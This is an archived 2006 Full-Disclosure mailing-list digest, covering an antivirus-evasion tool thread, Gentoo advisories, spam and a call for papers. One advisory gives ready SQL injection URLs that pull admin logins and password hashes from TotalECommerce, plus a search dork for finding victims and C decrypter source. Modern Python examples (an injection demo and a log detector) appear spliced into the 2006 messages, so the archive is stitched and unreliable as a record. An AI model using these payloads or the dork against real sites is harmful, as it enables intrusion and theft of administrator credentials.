Full Disclosure mailing list archives

Re: Full-Disclosure Digest, Vol 13, Issue 8
From: "DONNY MCCOY" <DMCCOY () bbl-inc com>
Date: Sun, 05 Mar 2006 07:01:03 -0500

I will be in Denver through Thursday and will return to Syracuse on
Friday.  I will check voicemail and e-mail periodically as time allows.

If your e-mail is urgent please contact the help desk in Syracuse at
x19511.

Thanks.

Donny

full-disclosure 03/05/06 07:00 >>>

Send Full-Disclosure mailing list submissions to
        full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
        https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
        full-disclosure-request () lists grok org uk

You can reach the person managing the list at
        full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please trim
your post appropriately. Thank you.


Today's Topics:

   1. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
   2. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
   3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov)
   4. [ GLSA 200603-01 ] WordPress: SQL injection vulnerability
      (Thierry Carrez)
   5. Advisory: TotalECommerce (index.asp id) Remote SQL Injection
      Vulnerability. (nukedx () nukedx com)
   6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in
      included XPdf code (Thierry Carrez)
   7. [ GLSA 200603-03 ] MPlayer: Multiple integer overflows
      (Thierry Carrez)
   8. Please remove me from the list (W1nd man)
   9. Re: Please remove me from the list (Alexander Hristov)
  10. (no subject) (Steven Rakick)
  11. Re: (no subject) (Steven Rakick)
  12. Re: (no subject) (PERFECT.MATERIAL)
  13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan)


----------------------------------------------------------------------

Message: 1
Date: Sat, 04 Mar 2006 13:09:57 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
        bugtraq () securityfocus com
Message-ID: <44098395.6010604 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
yeah already knowing they are most fucking bastards

Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module

On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit
is the small brother of an old tool known as UKsplitter, which is now
abandoned, does not work in vmware, fails to run under windows
2003.

DSplit has been coded for persons like me, targeted by AV firms and
 I'm not responsible for the bad uses of it, I recall this method has
been known for a long time and it's up to the AV firms to review their
detection software.


http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
 http://getdsplit.class101.org

usual critics, flames, can be directly sent to the Recycle Bin :>

_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/


-- Best Regards, Aleksander Hristov < root at securitydot.net > <
http://securitydot.net >




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
-----END PGP SIGNATURE-----



------------------------------

Message: 2
Date: Sat, 04 Mar 2006 13:16:33 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
        bugtraq () securityfocus com
Message-ID: <44098521.6010509 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
and it clearly shows clamav is a crap antivirus where the tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect viruses.



Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module

On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit
is the small brother of an old tool known as UKsplitter, which is now
abandoned, does not work in vmware, fails to run under windows
2003.

DSplit has been coded for persons like me, targeted by AV firms and
 I'm not responsible for the bad uses of it, I recall this method has
been known for a long time and it's up to the AV firms to review their
detection software.


http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
 http://getdsplit.class101.org

usual critics, flames, can be directly sent to the Recycle Bin :>

_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/


-- Best Regards, Aleksander Hristov < root at securitydot.net > <
http://securitydot.net >




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
-----END PGP SIGNATURE-----



------------------------------

Message: 3
Date: Sat, 4 Mar 2006 14:41:45 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: "ad () heapoverflow com" <ad () heapoverflow com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
        bugtraq () securityfocus com
Message-ID:
        <734063a30603040441v3beb90d5n7faab639859c8dd7 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

Well, clamav is the best AV for no money and it's very well developed,
again for no money :)
On 3/4/06, ad () heapoverflow com <ad () heapoverflow com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

and it clearly shows clamav is a crap antivirus where the tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect viruses.



Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module

On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit
is the small brother of an old tool known as UKsplitter, which is now
abandoned, does not work in vmware, fails to run under windows
2003.

DSplit has been coded for persons like me, targeted by AV firms and
 I'm not responsible for the bad uses of it, I recall this method has
been known for a long time and it's up to the AV firms to review their
detection software.


http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
 http://getdsplit.class101.org

usual critics, flames, can be directly sent to the Recycle Bin :>

_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/


-- Best Regards, Aleksander Hristov < root at securitydot.net > <
http://securitydot.net >




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
-----END PGP SIGNATURE-----




--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net



------------------------------

Message: 4
Date: Sat, 04 Mar 2006 16:45:31 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection
        vulnerability
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
        security-alerts () linuxsecurity com
Message-ID: <4409B61B.5060903 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: WordPress: SQL injection vulnerability
      Date: March 04, 2006
      Bugs: #121661
        ID: 200603-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

WordPress is vulnerable to an SQL injection vulnerability.

Background
==========

WordPress is a PHP and MySQL based content management and publishing
system.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-apps/wordpress      <= 1.5.2                         >= 2.0.1

Description
===========

Patrik Karlsson reported that WordPress 1.5.2 makes use of an
insufficiently filtered User Agent string in SQL queries related to
comments posting. This vulnerability was already fixed in the
2.0-series of WordPress.

Impact
======

An attacker could send a comment with a malicious User Agent parameter,
resulting in SQL injection and potentially in the subversion of the
WordPress database. This vulnerability wouldn't affect WordPress sites
which do not allow comments or which require that comments go through a
moderator.

Workaround
==========

Disable or moderate comments on your WordPress blogs.

Resolution
==========

All WordPress users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/89aced5d/signature-0001.bin
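The advisory's defect is a User-Agent header value pasted into the SQL statement that records a comment. The following is an added illustration, not WordPress code: it uses Python with an in-memory SQLite table as a constructed stand-in for the comments table, and shows the concatenating form beside the parameterized form on the same constructed header values.

```python
import sqlite3

# Constructed stand-in for a comments table (not the real WordPress schema).
SCHEMA = """
CREATE TABLE comments (
    comment_ID      INTEGER PRIMARY KEY,
    comment_author  TEXT NOT NULL,
    comment_content TEXT NOT NULL,
    comment_agent   TEXT NOT NULL
)
"""


def new_db() -> sqlite3.Connection:
    """Fresh in-memory database with the stand-in comments table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def insert_comment_vulnerable(conn, author, content, user_agent):
    """The defective pattern: request header text pasted straight into SQL.

    Whatever the client sends in User-Agent is handed to the SQL parser as
    query text, so a quote character ends the string literal and the rest of
    the header is read as syntax rather than stored as data.
    """
    sql = (
        "INSERT INTO comments (comment_author, comment_content, comment_agent) "
        f"VALUES ('{author}', '{content}', '{user_agent}')"
    )
    conn.execute(sql)
    conn.commit()


def insert_comment_safe(conn, author, content, user_agent):
    """Hardened form: placeholders keep header text as data, never as syntax."""
    conn.execute(
        "INSERT INTO comments (comment_author, comment_content, comment_agent) "
        "VALUES (?, ?, ?)",
        (author, content, user_agent),
    )
    conn.commit()


def stored_agents(conn):
    """Return every comment_agent value exactly as stored."""
    return [row[0] for row in conn.execute("SELECT comment_agent FROM comments")]


def demo(user_agent):
    """Run both paths with the same header and report what each did.

    Returns (vulnerable_outcome, safe_outcome): the vulnerable outcome is
    "stored" or the name of the SQLite error class raised, the safe outcome
    is the literal text that ended up in the table.
    """
    conn = new_db()
    try:
        insert_comment_vulnerable(conn, "alice", "hello", user_agent)
        vulnerable = "stored"
    except sqlite3.Error as exc:
        vulnerable = type(exc).__name__
    conn.close()

    conn = new_db()
    insert_comment_safe(conn, "alice", "hello", user_agent)
    safe = stored_agents(conn)[0]
    conn.close()
    return vulnerable, safe


if __name__ == "__main__":
    # Constructed headers: an ordinary browser string and one carrying quotes.
    for ua in ("Mozilla/5.0 (X11; Linux)", "Mozilla/5.0 ' O'Reilly"):
        print(ua, "->", demo(ua))
```

A header that merely contains an apostrophe already reaches the SQL parser in the first form, which is the condition the advisory's fix removes; the parameterized form stores the same text unchanged.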

------------------------------

Message: 5
Date: Sat, 04 Mar 2006 16:26:07 +0200
From: nukedx () nukedx com
Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id)
        Remote SQL Injection Vulnerability.
To: submit () milw0rm com, full-disclosure () lists grok org uk,
        bugtraq () securityfocus com
Message-ID: <20060304162607.2lyie75fm1m4gwow () webmail nukedx com>
Content-Type: text/plain;       charset=ISO-8859-9

--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx () nukedx com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries
into the id parameter of index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
With example 1 a remote attacker can get the admin's encrypted password and
with example 2 a remote attacker can get the admin's login name.
[PageID]: must be a working page id; you can get some from the front page.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18

---
Decrypter source in C
---
/*********************************************
*        TotalECommerce PWD Decrypter        *
*        Coded by |SaMaN| for nukedx         *
*          http://www.k9world.org            *
*              IRC.K9World.Org               *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>      /* toascii() */

int main(void)
{
  char buf[255];        /* crypted password as typed by the user */
  char buf2[255] = "";  /* decoded result; must start empty, strncat appends to it */
  char buf3[255];       /* one decoded character at a time */
  size_t i, len;
  int t, z;
  char saman;

  printf("%s", "|=------------------------------------=|\n");
  printf("%s", "   Coded by |SaMaN| @ IRC.K9World.Org\n");
  printf("%s", "|=------------------------------------=|\n\n");
  printf("%s", "Enter crypted password: ");
  if (scanf("%200s", buf) != 1)
  {
    fprintf(stderr, "no input\n");
    return 1;
  }

  /* The stored form is 255 minus each plaintext byte, so applying the same
     subtraction again recovers the original character. The byte is read as
     unsigned so values above 127 do not become negative. */
  len = strlen(buf);
  for (i = 0; i < len; i++)
  {
    t = (unsigned char)buf[i];
    z = 255 - t;
    saman = (char)toascii(z);
    snprintf(buf3, sizeof buf3, "%c", saman);
    strncat(buf2, buf3, sizeof buf2 - strlen(buf2) - 1);
  }
  printf("Result: %s\n", buf2);
  return 0;
}
---End of code---
Greets to: |SaMaN|
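For the defender's side of an advisory like this one, the following added example (not part of the advisory or the vendor's code) scans constructed web-server access-log lines, shaped after the index.asp?secao=...&id=-1+UNION+select request pattern above, and reports the requests whose query parameters carry UNION-based SQL text. The addresses and paths are placeholders, and the match rules are a heuristic for this request shape, not a complete injection detector.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines in Apache common log format. The client
# addresses are documentation ranges and /shop/ is a placeholder path; the
# second and third lines mirror the request shape the advisory describes.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2006:04:36:01 +0000] "GET /shop/index.asp?secao=25&id=17 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Mar/2006:04:36:09 +0000] "GET /shop/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha+from+administradores HTTP/1.1" 200 2311
203.0.113.5 - - [04/Mar/2006:04:36:15 +0000] "GET /shop/index.asp?secao=25&id=-1%20UNION%20SELECT%20login%2Clogin%20FROM%20administradores HTTP/1.1" 200 2290
198.51.100.7 - - [04/Mar/2006:04:40:00 +0000] "GET /shop/index.asp?secao=3&id=42 HTTP/1.1" 200 4870
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# After percent/plus decoding: a UNION ... SELECT pair anywhere in the value,
# or a numeric value immediately followed by an SQL keyword (the "-1 UNION"
# shape used to make the original row vanish and the injected rows show).
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)
SQL_TAIL_RE = re.compile(r"^-?\d+\s+(?:union|select|or|and)\b", re.IGNORECASE)


def suspicious_params(target: str) -> list:
    """Return (name, decoded_value) pairs in a request target that look like SQL text."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl already decodes %XX sequences and turns '+' into spaces.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if UNION_RE.search(value) or SQL_TAIL_RE.match(value):
            hits.append((name, value))
    return hits


def scan_log(text: str) -> list:
    """Parse each log line and return one finding per request carrying suspicious parameters."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "status": int(m.group("status")),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], f["status"], f["params"])
```

Both encoded forms decode to the same UNION text, so the rule fires on the parameter value rather than on the raw URL; a 200 status on such a request is the signal that the application answered it rather than rejecting it.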



------------------------------

Message: 6
Date: Sat, 04 Mar 2006 17:32:34 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX:
        Multiple overflows in included XPdf code
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
        security-alerts () linuxsecurity com
Message-ID: <4409C122.4090103 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf
            code
      Date: March 04, 2006
      Bugs: #115775
        ID: 200603-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

CSTeTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF
files, making them vulnerable to the execution of arbitrary code.

Background
==========

teTeX is a complete TeX distribution. It is used for creating and
manipulating LaTeX documents. CSTeX is a TeX distribution with Czech
and Slovak support. pTeX is an ASCII publishing TeX distribution.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  app-text/tetex       < 2.0.2-r8                       >= 2.0.2-r8
  2  app-text/cstetex     < 2.0.2-r2                       >= 2.0.2-r2
  3  app-text/ptex        < 3.1.5-r1                       >= 3.1.5-r1
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

CSTeX, teTeX, and pTeX include XPdf code to handle PDF files. This XPdf
code is vulnerable to several heap overflows (GLSA 200512-08) as well
as several buffer and integer overflows discovered by Chris Evans
(CESA-2005-003).

Impact
======

An attacker could entice a user to open a specially crafted PDF file
with teTeX, pTeX or CSTeX, potentially resulting in the execution of
arbitrary code with the rights of the user running the affected
application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All teTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8"

All CSTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2"

All pTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1"

References
==========

  [ 1 ] CVE-2005-3193
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193
  [ 2 ] GLSA 200512-08
        http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml
  [ 3 ] CESA-2005-003
        http://scary.beasts.org/security/CESA-2005-003.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/5e29724b/signature-0001.bin

------------------------------

Message: 7
Date: Sat, 04 Mar 2006 18:26:18 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple
        integer overflows
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
        security-alerts () linuxsecurity com
Message-ID: <4409CDBA.8060405 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MPlayer: Multiple integer overflows
      Date: March 04, 2006
      Bugs: #115760, #122029
        ID: 200603-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding
that could potentially result in the execution of arbitrary code.

Background
==========

MPlayer is a media player capable of handling multiple multimedia file
formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /    Vulnerable    /              Unaffected
    -------------------------------------------------------------------
  1  media-video/mplayer     < 1.0.20060217            >= 1.0.20060217

Description
===========

MPlayer makes use of the FFmpeg library, which is vulnerable to a heap
overflow in the avcodec_default_get_buffer() function discovered by
Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security
Research discovered two integer overflows in ASF file format decoding,
in the new_demux_packet() function from libmpdemux/demuxer.h and the
demux_asf_read_packet() function from libmpdemux/demux_asf.c.

Impact
======

An attacker could craft a malicious media file which, when opened using
MPlayer, would lead to a heap-based buffer overflow. This could result
in the execution of arbitrary code with the permissions of the user
running MPlayer.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MPlayer users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/mplayer-1.0.20060217"

References
==========

  [ 1 ] CVE-2005-4048
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048
  [ 2 ] CVE-2006-0579
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
  [ 3 ] GLSA 200601-06
        http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/568fbea3/signature-0001.bin

------------------------------

Message: 8
Date: Sat, 4 Mar 2006 22:16:10 +0200
From: W1nd man <w1ndm4n () walla com>
Subject: [Full-disclosure] Please remove me from the list
To: <full-disclosure () lists grok org uk>
Message-ID: <1141503369.961000-13997465-23441 () walla com>
Content-Type: text/plain; charset="us-ascii"

An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f69d9753/attachment-0001.html

------------------------------

Message: 9
Date: Sun, 5 Mar 2006 03:52:28 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] Please remove me from the list
To: "W1nd man" <w1ndm4n () walla com>
Cc: full-disclosure () lists grok org uk
Message-ID:
        <734063a30603041752v7a8cc6efnd28861cae0f8be32 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

You can remove yourself from here:
https://lists.grok.org.uk/mailman/listinfo/full-disclosure

On 3/4/06, W1nd man <w1ndm4n () walla com> wrote:



Please remove me from the list


________________________________

Walla! Mail - get your free 3G mail today
_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net



------------------------------

Message: 10
Date: Sat, 4 Mar 2006 18:01:51 -0800
From: Steven Rakick <stevenrakick () yahoo com>
Subject: [Full-disclosure] (no subject)
To: full-disclosure () lists grok org uk
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
Content-Type: text/plain; charset="iso-8859-1"

Hello HACKERZ!, 

Your personal DONGEZ to this message.

Sincerely, 
BanHaus manager

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f1416faf/attachment-0001.html

------------------------------

Message: 11
Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST)
From: Steven Rakick <stevenrakick () yahoo com>
Subject: Re: [Full-disclosure] (no subject)
To: full-disclosure () lists grok org uk
Message-ID: <20060305042832.34191.qmail () web53201 mail yahoo com>
Content-Type: text/plain; charset=iso-8859-1

Not that it matters but...

Received: from www.c0replay.net (unknown
[206.251.72.74])
        by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
        for <full-disclosure () lists grok org uk>;
        Sun,  5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure () lists grok org uk
From: Steven Rakick <stevenrakick () yahoo com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


------------------------------

Message: 12
Date: Sun, 5 Mar 2006 00:34:03 -0500
From: PERFECT.MATERIAL <perfect.material () gmail com>
Subject: Re: [Full-disclosure] (no subject)
To: "Steven Rakick" <stevenrakick () yahoo com>
Cc: full-disclosure () lists grok org uk
Message-ID:
        <631ac1d90603042134n7a22e7aale14d2aa7914dda58 () mail gmail com>
Content-Type: text/plain; charset="iso-8859-1"

Dick Breath,

You should sign your electronic mail with some unhackable crypto
technology.  That way you will never need to show off your cut and paste
technology to the others.  You are irresponsible. Not that it matters
but...

PERFECT.MATERIAL


On 3/4/06, Steven Rakick <stevenrakick () yahoo com> wrote:

Not that it matters but...

Received: from www.c0replay.net (unknown
[206.251.72.74])
       by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
       for <full-disclosure () lists grok org uk>;
       Sun,  5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure () lists grok org uk
From: Steven Rakick <stevenrakick () yahoo com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060305/d547fd1e/attachment-0001.html

------------------------------

Message: 13
Date: Sun, 05 Mar 2006 13:34:43 +0800
From: Praburaajan <prabu () hackinthebox org>
Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers
To: full-disclosure () lists grok org uk,
        dailydave () lists immunitysec com,
        pen-test () securityfocus com,
        bugtraq () securityfocus com,   Voipsec () voipsa org,
submit () milw0rm com,
        webappsec () securityfocus com,         ipv6 () ietf org,
        security-basics () securityfocus com
Message-ID: <440A7873.4000202 () hackinthebox org>
Content-Type: text/plain; charset=windows-1252; format=flowed

Greetings from Hack in The Box -- We are pleased to announce that the
Call for Papers (CfP) for HITBSecConf2006 - Malaysia is now open! Set to
take place from September 18th - 21st 2006 at The Westin Kuala Lumpur,
this year's conference promises to once again deliver an International
deep-knowledge security conference. HITBSecConf has been described as
"the most intimate of hacker gatherings" and is the largest network
security conference in Asia!

SUBMISSION 

HITBSecConf is a deep-knowledge technical conference. Talks that are
more technical or that discuss new and never before seen attack methods
are of more interest than a subject that has been covered several times
before. Summaries not exceeding 250 words should be submitted (in plain
text format) to cfp -at- hackinthebox.org for review and possible
inclusion in the programme. 

Submissions are due no later than 1st of May 2006

TOPICS

Topics of interest include, but are not limited to the following:

* Analysis of network and security vulnerabilities
* Firewall technologies
* Intrusion detection
* Data Recovery and Incident Response
* GPRS, 3G and CDMA Security
